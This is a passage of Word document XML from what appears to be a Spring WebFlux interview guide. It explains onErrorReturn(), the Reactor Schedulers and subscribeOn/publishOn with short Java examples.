        </w:rPr>
        <w:t>What is onErrorReturn() in Spring WebFlux</w:t>
      </w:r>
      <w:r w:rsidR="00163F3B" w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0070C0"/>
        </w:rPr>
        <w:t>?</w:t>
      </w:r>
      <w:bookmarkEnd w:id="530"/>
    </w:p>
    <w:p w14:paraId="13BB1D9D" w14:textId="3494ACF9"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turn() Works:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2148DB7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turn() replaces the error with a static value (rather than a new reactive stream).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0317822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operator is typically used when you want to provide a default value instead of an error when something goes wrong.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="37E8CE9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79492D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turn(T fallback);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0758DC6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llback</w:t>
      </w:r>
      <w:r w:rsidRPr="00B13F85">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>: The value that will be returned when an error occurs in the stream.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="770CC052"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3F3B069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to illustrate how onErrorReturn() works:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5679CCE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19B70DF8" w14:textId="77777777" w:rsidR="00E53F1F" w:rsidRPr="00B13F85" w:rsidRDefault="00E53F1F" w:rsidP="00B13F85">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="1E9F983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6B9F6DDD" w14:textId="77777777" w:rsidR="00E53F1F" w:rsidRPr="00B13F85" w:rsidRDefault="00E53F1F" w:rsidP="00B13F85">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="5E46A91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57D220F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79F9BBF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7CAE301A" w14:textId="77777777" w:rsidR="00E53F1F" w:rsidRPr="00B13F85" w:rsidRDefault="00E53F1F" w:rsidP="00B13F85">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="417849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3E97A8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B32BC73" w14:textId="77777777" w:rsidR="00E53F1F" w:rsidRPr="00B13F85" w:rsidRDefault="00E53F1F" w:rsidP="00B13F85">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="44745FA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3F86FF6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390216C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0306E6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D08B31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51CB90B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097B6CA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turn() operator catches the error and returns the predefined fallback value "Fallback Value".</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5F04615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error.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4618220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26DF0A7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tic Fallback Value</w:t>
      </w:r>
      <w:r w:rsidRPr="00B13F85">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>: Unlike onErrorResume(), which allows you to return a new Mono or Flux (possibly involving more complex logic), onErrorReturn() simply returns a static value. It's a more simplified version of error handling.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="55A1447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 Further Processing</w:t>
      </w:r>
      <w:r w:rsidRPr="00B13F85">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>: When an error occurs, onErrorReturn() doesn’t allow for further processing or transformations. It just replaces the error with a default value.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="26CD06F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r Error Handling</w:t>
      </w:r>
      <w:r w:rsidRPr="00B13F85">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>: Use onErrorReturn() when you want a simple fallback value and don't need to execute additional logic or return a new reactive stream.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2290006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onErrorReturn():</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="096B3EE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7258666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Error Fallback");</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="445D5263" w14:textId="77777777" w:rsidR="00E53F1F" w:rsidRPr="00B13F85" w:rsidRDefault="00E53F1F" w:rsidP="00B13F85">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="4B2E793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  // Output: Error Fallback</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="50ECA68B"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onErrorResume():</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="21BDF6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This operator allows you to replace an error with an entirely new Mono or Flux, enabling more flexibility and complex fallback logic (such as calling another service or returning a different stream).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0FA60B0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onErrorReturn()</w:t>
      </w:r>
      <w:r w:rsidRPr="00B13F85">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>: This operator provides a quick and simple fallback by returning a static value when an error occurs, without involving any additional stream or logic.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7000E6E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p w14:paraId="6DA7E97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you need a default value</w:t>
      </w:r>
      <w:r w:rsidRPr="00B13F85">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>: onErrorReturn() is useful when you need to return a simple, predefined fallback value (e.g., 0, null, "Error"), rather than re-initiating the entire stream logic.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5DB44C4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error handling</w:t>
      </w:r>
      <w:r w:rsidRPr="00B13F85">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>: If you don't require complex error recovery logic and just want to return a static value as a fallback.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="68DF15BC"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FA37E8">
          <v:rect id="_x0000_i2315" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="5151B43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in Real-world Application:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="467CC4C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agine you are reading data from a file, and if an error occurs (e.g., file not found), you want to return a default response instead of throwing an error:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3B9501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readFile() {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5E5CAAC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File not found"))</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="241010D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Default File Content");</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1763210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F725B1" w14:textId="77777777" w:rsidR="00E53F1F" w:rsidRPr="00B13F85" w:rsidRDefault="00E53F1F" w:rsidP="00B13F85">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="346DE5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dFile().subscribe(System.out::println);  // Output: Default File Content</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7716800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nstead of propagating the error (file not found), it directly returns "Default File Content" as the fallback.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="353B7FF7"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3F7C0C">
          <v:rect id="_x0000_i2316" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="46A8E95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317" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="4114E17C" w14:textId="51A3F6F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1" w:name="_Toc197867745"/>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0070C0"/>
        </w:rPr>
        <w:t>What is the role of Schedulers in reactive programming with Spring WebFlux</w:t>
      </w:r>
      <w:r w:rsidR="00163F3B" w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0070C0"/>
        </w:rPr>
        <w:t>?</w:t>
      </w:r>
      <w:bookmarkEnd w:id="531"/>
    </w:p>
    <w:p w14:paraId="5765DCA7" w14:textId="4FA1D505"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with Spring WebFlux,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play an essential role in managing the execution context of reactive streams, determining on which thread the operations in the reactive pipeline should be executed.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="79CEC89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of Schedulers in Spring WebFlux:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5EDF96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Thread Execution</w:t>
      </w:r>
      <w:r w:rsidRPr="00B13F85">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="42A83F56"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operations are typically executed asynchronously. The default behavior is to execute operations on the calling thread, but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you to shift execution to different threads or thread pools.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4B92A76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you can control whether an operation runs on the main thread, a worker thread, or a dedicated thread pool, improving resource utilization.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="542DCAA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suring Non-blocking Behavior</w:t>
      </w:r>
      <w:r w:rsidRPr="00B13F85">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7BC347A5"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Spring WebFlux, you typically want operations to be non-block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Concurrency</w:t>
      </w:r>
      <w:r w:rsidRPr="00B13F85">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6023E52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rallel Execution</w:t>
      </w:r>
      <w:r w:rsidRPr="00B13F85">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="109D1D38"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reactive programming, multiple operations may run concurrently (e.g., making multiple API call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these tasks to run in parallel, which is crucial for maintaining performance in scenarios where multiple independent tasks need to be executed concurrently.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="76769CF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ypes of Schedulers in Spring WebFlux:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3F71D08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built-in schedulers, each tailored for different use cases:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0C5AC36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parallel()</w:t>
      </w:r>
      <w:r w:rsidRPr="00B13F85">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1107553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CPU-bound operations that can run in parallel. It typically uses a fixed-size thread pool with a number of threads equal to the number of available CPU cores.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="615D9A3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ideal for tasks that require significant computation but should not block the main thread (e.g., complex data transformations).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5EF20B6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chedulers.elastic()</w:t>
      </w:r>
      <w:r w:rsidRPr="00B13F85">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="06ABEC4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handling tasks that might block (like reading files or making network requests) without blocking the calling thread.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7DEC10F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single()</w:t>
      </w:r>
      <w:r w:rsidRPr="00B13F85">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="64537BE4"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immediate()</w:t>
      </w:r>
      <w:r w:rsidRPr="00B13F85">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="243E610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 of Schedulers in Spring WebFlux:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3432BAF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Let's look at a simple example of how to use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in Spring WebFlux:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="193C69F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BA958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3A064F1B" w14:textId="77777777" w:rsidR="00E53F1F" w:rsidRPr="00B13F85" w:rsidRDefault="00E53F1F" w:rsidP="00B13F85">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="1F157F1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ReactiveExample {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="16B9B614" w14:textId="77777777" w:rsidR="00E53F1F" w:rsidRPr="00B13F85" w:rsidRDefault="00E53F1F" w:rsidP="00B13F85">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="6D8AE8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050611B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Reactive World")</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="54E1D77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boundedElastic())  // Move to an elastic thread pool</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7713EF7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52D645A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ome CPU-bound work</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="013BE68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 Transformed";</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7207730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2D3BC6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parallel())  // Move to parallel thread pool for CPU-bound tasks</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2FF005C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Operation Finished"))</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="261B546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0181BF7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9B467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EA53D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2C9E340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boundedElastic())</w:t>
      </w:r>
      <w:r w:rsidRPr="00B13F85">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>: This moves the subsequent operations to a different thread pool (boundedElastic), which is typically used for I/O-bound operations (e.g., interacting with a database or network).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4C3F6FE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parallel())</w:t>
      </w:r>
      <w:r w:rsidRPr="00B13F85">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>: This shifts the work done by the map function to the parallel thread pool, which is suitable for CPU-bound tasks.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="38B4A59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This is an action that will be executed when the subscription is completed (either successfully or with an error).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0541864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Using Schedulers:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3DC9CF6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Ensures that the main thread remains free for other tasks, while heavy or blocking operations can run in dedicated thread pools.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="02275C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 By choosing the right thread pools, you can optimize CPU-bound and I/O-bound operations, ensuring better performance and responsiveness.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3B209E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Management</w:t>
      </w:r>
      <w:r w:rsidRPr="00B13F85">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>: Provides control over which operations run concurrently, helping you avoid contention and improve system scalability.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6D5C810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 Isolation</w:t>
      </w:r>
      <w:r w:rsidRPr="00B13F85">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>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536A1BC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318" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="5663449C" w14:textId="1DBDF8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2" w:name="_Toc197867746"/>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0070C0"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>Can you explain how to schedule tasks using subscribeOn and publishOn</w:t>
      </w:r>
      <w:r w:rsidR="00163F3B" w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0070C0"/>
        </w:rPr>
        <w:t>?</w:t>
      </w:r>
      <w:bookmarkEnd w:id="532"/>
    </w:p>
    <w:p w14:paraId="71F559AE" w14:textId="11488A33"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bscribeOn()</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="44E6656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subscribeOn() method is used to specify </w:t>
      </w:r>
      <w:r w:rsidRPr="00B13F85">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>on which thread the subscription and initial processing of the reactive pipeline should take place</w:t>
      </w:r>
      <w:r w:rsidRPr="00B13F85">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">. It affects the thread on which the entire pipeline is subscribed to and starts execution. This means that the subscribeOn() method defines the thread context for the </w:t>
      </w:r>
      <w:r w:rsidRPr="00B13F85">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>first operation in the pipeline</w:t>
      </w:r>
      <w:r w:rsidRPr="00B13F85">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="55CC20D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subscribeOn() is applied to the </w:t>
      </w:r>
      <w:r w:rsidRPr="00B13F85">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>entire chain</w:t>
      </w:r>
      <w:r w:rsidRPr="00B13F85">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> of operators, not just the operation it is applied to.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1313BEF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ontrols where the subscription and data retrieval (like network calls or database access) will occur.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="779165F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ublishOn()</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2002827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publishOn() method is used to specify </w:t>
      </w:r>
      <w:r w:rsidRPr="00B13F85">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>on which thread the subsequent operations in the reactive pipeline should execute</w:t>
      </w:r>
      <w:r w:rsidRPr="00B13F85">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">. It affects the thread used for </w:t>
      </w:r>
      <w:r w:rsidRPr="00B13F85">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>all subsequent operations after it is applied</w:t>
      </w:r>
      <w:r w:rsidRPr="00B13F85">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> in the pipeline. It does not affect earlier stages in the pipeline that have already been executed.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1B53C3E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publishOn() is applied </w:t>
      </w:r>
      <w:r w:rsidRPr="00B13F85">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>only from the point of invocation onwards</w:t>
      </w:r>
      <w:r w:rsidRPr="00B13F85">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> in the reactive chain.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="778F695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llows changing the execution thread for specific parts of the pipeline, especially when a particular operation might be I/O-bound (network call, database access) or CPU-bound (heavy computation).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="53C9AC3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do subscribeOn() and publishOn() work?</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7AE1747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w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="363D6D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ets the thread for the </w:t>
      </w:r>
      <w:r w:rsidRPr="00B13F85">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>entire subscription</w:t>
      </w:r>
      <w:r w:rsidRPr="00B13F85">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>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w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7DD56E9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4284FB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break it down with an example:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="09881A7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6C4B2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668CF887" w14:textId="77777777" w:rsidR="007264A0" w:rsidRPr="00B13F85" w:rsidRDefault="007264A0" w:rsidP="00B13F85">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="492744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SchedulingExample {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="027E02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throws InterruptedException {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="374259C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Hello")</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="077AAC1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On controls where the subscription happens</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0828D0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boundedElastic())  // Perform initial subscription on a bounded elastic thread pool</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="20DF88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3A9637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1 on thread: " + Thread.currentThread().getName());</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2FDE3BE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World!";</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7BAC9CF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80E11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ublishOn controls where the next operation happens</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3EC386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parallel())  // Move next map operation to the parallel thread pool</w:t>
      </w:r>
    </w:p>
